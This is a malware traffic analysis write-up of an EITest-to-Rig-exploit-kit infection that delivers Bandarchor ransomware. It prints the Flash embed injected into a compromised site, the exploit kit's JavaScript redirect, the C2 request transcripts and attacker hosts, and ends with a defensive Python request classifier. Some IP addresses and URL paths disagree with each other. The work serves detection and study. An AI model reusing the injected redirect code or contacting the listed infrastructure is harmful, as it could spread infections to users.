EITest -> Rig Exploit Kit -> Bandarchor Ransomware Traffic Analysis

Source: malware-traffic-analysis.net

The infection method is as follows:

  • www[.]tdca[.]ca – Compromised site
  • mapobifi[.]xyz – 85.93.0.110 port 80 – EITest gate
  • ew[.]203kcontractorsarkansas[.]com – 109.234.36.220 port 80 – Rig EK
  • 109.236.87.204 – GET /default.jpg – Post-infection traffic caused by the Bandarchor ransomware
  • 109.236.87.204 – POST /yyy/fers.php – Post-infection traffic caused by the Bandarchor ransomware

* Analyze the PCAP using the display filter “http.request”.

Relevant Additional Analysis:

  1. GET / HTTP/1.1 request to 207.182.128.162 (length: 523 bytes)
  2. GET HTTP requests to 85.93.0.110 x2 (lengths: 414 & 426 bytes, respectively)
  3. GET HTTP requests to 109.234.36.220 x4 (lengths: 523, 748, 698, & 504 bytes)
  4. GET HTTP requests to 109.236.36.204 x3 (lengths: 207, 229, & 229 bytes)


  1. Following the TCP stream of the GET request to 207.182.128.162 (length: 523 bytes) reveals a Flash movie value and an embedded source with “allowScriptAccess” set to “always”, pointing to hxxp://mapobifi.xyz/qdxtqktb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile from the website hxxp://www.tdca[.]ca.

The full source code injected into the compromised website is as follows:

<param name="allowScriptAccess" value="always"/><param name="movie" value="hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/"/>

  

  2. GET mapobifi[.]xyz/qdxtqktkb3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile retrieves the Shockwave Flash file, which begins with the header “CWS” (referrer: hxxp://tdca.ca).

GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hxxp://www[.]tdca[.]ca/
x-flash-version: 19,0,0,185
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:49 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 5508
Connection: close
Content-Type: application/x-shockwave-flash
 
 
GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/xqt.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://www[.]tdca[.]ca/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: mapobifi.xyz
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:50 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 821
Connection: close
Content-Type: text/html; charset=UTF-8
 
 
3. The returned page uses JavaScript to redirect the user to ‘hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE’ (size? type?).
The full source code is as follows:

FkvuNhVRWkQvU gHotiiKKThQZIzrkE fTWAIIlM d hRBB

document.location.href = "hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE";

geLpj gSiBzQqkfSZxSYdDAiUSDyI JwGPSXD xnJ


 
4. GET hxxp://ew[.]203kcontractorsarkansas[.]com/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU
5. The same request, but to index[.]php?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU

6. GET to /default.jpg and POST to /yyy/fers[.]php on 109.236.87.204

The full transcript is as follows:
GET /default[.]jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 109.236.87.204
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Date: Sat, 27 Aug 2016 01:10:20 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: “7-5332e92dca840”
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg
 
default

POST /yyy/fers[.]php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 109.236.87.204
Content-Length: 1395
Cache-Control: no-cache
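As an added example (not part of the original write-up or the referenced PCAP), the Python below takes request header blocks like the ones in the transcripts above, embedded here as constructed samples with the defanging removed, and tags each with the stage of the chain whose header pattern it matches: the x-flash-version fetch with a cross-host Referer, the long single-parameter landing query, the hard-coded post_example User-Agent on the POST, and the no-cache, referer-less GET to an IP-literal host. The tag names, the 40-character token threshold and the example.com control request are my assumptions.

```python
import re

# Constructed samples: header blocks trimmed from the requests shown in this analysis,
# plus one benign request (example.com) as a control. Defanging removed so they parse.
SAMPLE_REQUESTS = [
    "GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/ HTTP/1.1\n"
    "Referer: http://www.tdca.ca/\nx-flash-version: 19,0,0,185\nHost: mapobifi.xyz\n",
    "GET /?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQU HTTP/1.1\n"
    "Host: ew.203kcontractorsarkansas.com\n",
    "GET /default.jpg HTTP/1.1\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\n"
    "Host: 109.236.87.204\nCache-Control: no-cache\n",
    "POST /yyy/fers.php HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: post_example\n"
    "Host: 109.236.87.204\nContent-Length: 1395\nCache-Control: no-cache\n",
    "GET /index.html HTTP/1.1\nHost: example.com\nReferer: http://example.com/\nUser-Agent: Mozilla/5.0\n",
]

IP_LITERAL = re.compile(r"\d{1,3}(\.\d{1,3}){3}")
# Landing-page shape seen above: "/" or "/index.php" with one parameter carrying a long token value
# (40-character minimum is an assumed threshold).
EK_LANDING = re.compile(r"/(index\.php)?\?[A-Za-z0-9_]+=[A-Za-z0-9_-]{40,}$")

def parse_request(raw):
    """Split a raw HTTP request header block into (method, path, headers); header names lowercased."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def classify(raw):
    """Return the chain stages (assumed tag names) whose header pattern this request matches."""
    method, path, h = parse_request(raw)
    host, referer, ua = h.get("host", ""), h.get("referer", ""), h.get("user-agent", "")
    tags = []
    # Gate: Flash Player fetching a movie from a host other than the page that embedded it.
    if "x-flash-version" in h and referer and host not in referer:
        tags.append("eitest-gate-flash")
    if EK_LANDING.match(path):
        tags.append("rig-ek-landing")
    # Post-infection: the hard-coded "post_example" User-Agent on the C2 POST, and the
    # no-cache, referer-less GET to an IP-literal host that precedes it in the capture.
    if method == "POST" and ua == "post_example":
        tags.append("bandarchor-checkin")
    if method == "GET" and IP_LITERAL.fullmatch(host) and h.get("cache-control") == "no-cache" and not referer:
        tags.append("bandarchor-beacon")
    return tags

def scan(requests):
    """Tag every request; returns (host, path, tags) per request in capture order."""
    out = []
    for r in requests:
        _method, path, h = parse_request(r)
        out.append((h.get("host", ""), path, classify(r)))
    return out
```

Running scan(SAMPLE_REQUESTS) tags the four requests from the chain and leaves the control request untagged; the same function can be fed header blocks exported from the "http.request" filter.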
